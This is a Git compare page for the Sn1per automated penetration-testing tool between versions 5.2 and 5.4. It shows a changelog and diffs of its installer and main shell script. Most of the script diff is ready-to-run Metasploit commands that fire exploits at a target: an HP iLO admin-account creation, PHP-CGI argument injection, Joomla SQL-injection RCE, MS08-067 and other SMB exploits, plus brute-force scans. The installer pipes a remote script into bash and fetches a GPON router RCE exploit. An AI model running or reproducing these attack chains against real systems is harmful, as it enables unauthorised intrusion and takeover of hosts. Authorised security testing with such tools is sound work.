BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: BitMaster:v5.2
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a
...
compare: BitMaster:v5.4
Branches Tags
BitMaster:master
BitMaster:v9.2 BitMaster:v9.1 BitMaster:v9.0 BitMaster:v8.9 BitMaster:v8.8 BitMaster:v8.7 BitMaster:v8.6 BitMaster:v8.5 BitMaster:v8.4 BitMaster:v8.3 BitMaster:v8.2 BitMaster:v8.1 BitMaster:v8.0 BitMaster:v7.4 BitMaster:v7.3 BitMaster:v7.2 BitMaster:v7.1 BitMaster:v7.0 BitMaster:v6.2 BitMaster:v6.1 BitMaster:v6.0 BitMaster:v5.10 BitMaster:v5.9 BitMaster:v5.8 BitMaster:v5.7 BitMaster:v5.6 BitMaster:v5.5 BitMaster:v5.4 BitMaster:v5.3 BitMaster:v5.2 BitMaster:v5.1 BitMaster:v5.0 BitMaster:v4.4 BitMaster:v4.3 BitMaster:v4.2 BitMaster:v4.1 BitMaster:v4.0 BitMaster:v3.0 BitMaster:v2.9 BitMaster:v2.8 BitMaster:v2.7 BitMaster:v2.6c BitMaster:v2.6 BitMaster:v2.5 BitMaster:v2.4 BitMaster:v2.3 BitMaster:v2.2 BitMaster:v2.1 BitMaster:v2.0 BitMaster:v1.9 BitMaster:v1.8c BitMaster:v1.8b BitMaster:v1.8a

7 Commits
v5.2 ... v5.4

Author SHA1 Message Date
1N3
84e3559a6f Merge pull request #172 from m0rv4i/master 
Fix dnscan path and go dependencies
 2018-08-10 08:15:30 -07:00
m0rv4i
ae375f70da Fix dnscan path and go dependencies 2018-08-10 12:55:00 +01:00
WP Engine Marketing
07dfa854ab Sn1per by 1N3@CrowdShield 2018-08-09 14:58:15 -07:00
WP Engine Marketing
d4f35abc7e Sn1per by 1N3@CrowdShield 2018-08-06 09:23:46 -07:00
WP Engine Marketing
b3ab9a0fba Sn1per by 1N3@CrowdShield 2018-08-04 14:23:38 -07:00
WP Engine Marketing
f24f966a29 Sn1per by 1N3@CrowdShield 2018-08-04 13:38:44 -07:00
WP Engine Marketing
c3861de996 Sn1per by 1N3@CrowdShield 2018-08-04 13:15:41 -07:00
3 changed files with 25 additions and 178 deletions
Expand all files Collapse all files

4
CHANGELOG.md
View File

@@ -1,4 +1,8 @@
## CHANGELOG:
* v5.3 - Updated AMass repo in install.sh
* v5.3 - Removed CloudFail
* v5.3 - Fixed issue with subfinder missing brute force list
* v5.3 - Fixed issue with invalid dnsscan reference
* v5.2 - Added SubOver subdomain takeover scanner
* v5.2 - Added Subfinder subdomain enumeration tool
* v5.2 - Added Amass subdomain enumeration tool

16
install.sh
View File

@@ -21,9 +21,10 @@ echo ""
INSTALL_DIR=/usr/share/sniper
LOOT_DIR=/usr/share/sniper/loot
PLUGINS_DIR=/usr/share/sniper/plugins
GO_DIR=~/go/bin
echo -e "$OKGREEN + -- --=[This script will install sniper under $INSTALL_DIR. Are you sure you want to continue?$RESET"
read answer
read answer
mkdir -p $INSTALL_DIR 2> /dev/null
mkdir -p $LOOT_DIR 2> /dev/null
@@ -37,7 +38,7 @@ cp -Rf * $INSTALL_DIR 2> /dev/null
cd $INSTALL_DIR
echo -e "$OKORANGE + -- --=[Installing package dependencies...$RESET"
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq
apt-get install nfs-common eyewitness nodejs wafw00f xdg-utils metagoofil clusterd ruby rubygems python dos2unix zenmap sslyze arachni aha libxml2-utils rpcbind uniscan xprobe2 cutycapt host whois dirb dnsrecon curl nmap php php-curl hydra iceweasel wpscan sqlmap nbtscan enum4linux cisco-torch metasploit-framework theharvester dnsenum nikto smtp-user-enum whatweb sslscan amap jq golang
apt-get install waffit 2> /dev/null
pip install dnspython colorama tldextract urllib3 ipaddress requests
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.8/install.sh | bash
@@ -52,6 +53,7 @@ rm -Rf $PLUGINS_DIR 2> /dev/null
mkdir $PLUGINS_DIR 2> /dev/null
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
mkdir -p $GO_DIR
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -68,19 +70,18 @@ git clone https://github.com/nccgroup/shocker.git
git clone --depth 1 https://github.com/drwetter/testssl.sh.git
git clone https://github.com/BishopFox/spoofcheck.git
git clone https://github.com/arthepsy/ssh-audit
git clone https://github.com/m0rtem/CloudFail.git
git clone https://github.com/deibit/cansina
git clone https://github.com/1N3/jexboss.git
git clone https://github.com/maurosoria/dirsearch.git
git clone https://github.com/jekyc/wig.git
git clone https://github.com/rbsec/dnscan.git
pip install -r $PLUGINS_DIR/dnscan/requirements.txt
pip3 install -r $PLUGINS_DIR/dnscan/requirements.txt
mv $INSTALL_DIR/bin/slurp.zip $PLUGINS_DIR
unzip slurp.zip
rm -f slurp.zip
cd ~/go/bin/;go get github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/caffix/amass;mv amass /usr/local/bin/
cd ~/go/bin;go get github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd ~/go/bin/;go get -u github.com/Ice3man543/SubOver; mv SubOver /usr/local/bin/subover
cd ~/go/bin;go get -u github.com/OWASP/Amass/cmd/amass; mv amass /usr/local/bin/
cd ~/go/bin;go get -u github.com/subfinder/subfinder; mv subfinder /usr/local/bin/subfinder
cd $PLUGINS_DIR
wget https://github.com/michenriksen/aquatone/blob/master/subdomains.lst -O /usr/share/sniper/plugins/Sublist3r/subdomains.lst
wget https://raw.githubusercontent.com/1N3/IntruderPayloads/master/FuzzLists/dirbuster-quick.txt -O /usr/share/sniper/plugins/cansina/dirbuster-quick.txt
@@ -89,7 +90,6 @@ wget https://raw.githubusercontent.com/xorrbit/nmap/865142904566e416944ebd6870d4
wget https://raw.githubusercontent.com/f3d0x0/GPON/master/gpon_rce.py -O /usr/share/sniper/bin/gpon_rce.py
cp $INSTALL_DIR/bin/iis-buffer-overflow.nse /usr/share/nmap/scripts/iis-buffer-overflow.nse 2> /dev/null
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/CloudFail/ && apt-get install python3-pip && pip3 install -r requirements.txt
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh
cd $PLUGINS_DIR/spoofcheck/ && pip install -r requirements.txt

183
sniper
View File

@@ -3,7 +3,7 @@
# + -- --=[http://xerosecurity.com
#
VER="5.2"
VER="5.3"
BROWSER="firefox" # SET DEFAULT BROWSER
INSTALL_DIR="/usr/share/sniper"
PLUGINS_DIR="$INSTALL_DIR/plugins"
@@ -626,69 +626,45 @@ if [ "$MODE" = "webporthttp" ]; then
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
@@ -887,21 +863,11 @@ if [ "$MODE" = "webporthttps" ]; then
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
wget https://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-https.txt 2> /dev/null
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET -p $PORT
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -923,77 +889,46 @@ if [ "$MODE" = "webporthttps" ]; then
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -1167,14 +1102,14 @@ if [ "$MODE" = "stealth" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$SUBLIST3R" = "1" ]; then
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1182,15 +1117,15 @@ if [ "$MODE" = "stealth" ]; then
fi
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
@@ -1661,12 +1596,12 @@ if [ "$RECON" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
whois $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
python $PLUGINS_DIR/Sublist3r/sublist3r.py -d $TARGET -vvv -o $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
if [ "$AMASS" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA AMASS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
amass -whois -ip -brute -o $LOOT_DIR/domains/domains-$TARGET-amass.txt -min-for-recursive 3 -d $TARGET 2>/dev/null
cut -d, -f1 $LOOT_DIR/domains/domains-$TARGET-amass.txt | grep $TARGET > $LOOT_DIR/domains/domains-$TARGET-amass-sorted.txt
@@ -1675,15 +1610,15 @@ if [ "$RECON" = "1" ]; then
if [ "$SUBFINDER" = "1" ]; then
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED GATHERING DNS SUBDOMAINS $RESET"
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBFINDER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -d $TARGET 2>/dev/null
subfinder -o $LOOT_DIR/domains/domains-$TARGET-subfinder.txt -b -w $DOMAINS_DEFAULT -d $TARGET 2>/dev/null
fi
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS $RESET"
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
if [ "$DNSCAN" = "1" ]; then
python /pentest/recon/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
python3 $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_FULL -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-$TARGET-ips.txt
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt | grep $TARGET | awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
fi
@@ -1986,10 +1921,6 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2010,75 +1941,39 @@ else
echo -e "${OKGREEN}====================================================================================${RESET}"
nikto -h http://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-http.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "80"; set SSL false; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2294,10 +2189,6 @@ else
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
clusterd --ssl -i $TARGET
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2318,79 +2209,38 @@ else
nikto -h https://$TARGET -output $LOOT_DIR/web/nikto-$TARGET-https.txt
fi
cd $INSTALL_DIR
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "443"; setg SSL true; run; use scanner/http/webdav_website_content; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 443; set SSL true; set WAIT 2; run; exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 443; set SSL true; run; back;exit;"
echo -e "${OKGREEN}====================================================================================${RESET}"
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}"
@@ -2464,13 +2314,6 @@ else
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -Pn -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smb-protocols --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; use auxiliary/scanner/smb/smb_version; run; use auxiliary/scanner/smb/pipe_auditor; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; use exploit/windows/smb/ms06_040_netapi; run; use exploit/windows/smb/ms05_039_pnp; run; use exploit/windows/smb/ms10_061_spoolss; run; use exploit/windows/smb/ms09_050_smb2_negotiate_func_index; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_ms17_010; run; exit;"
fi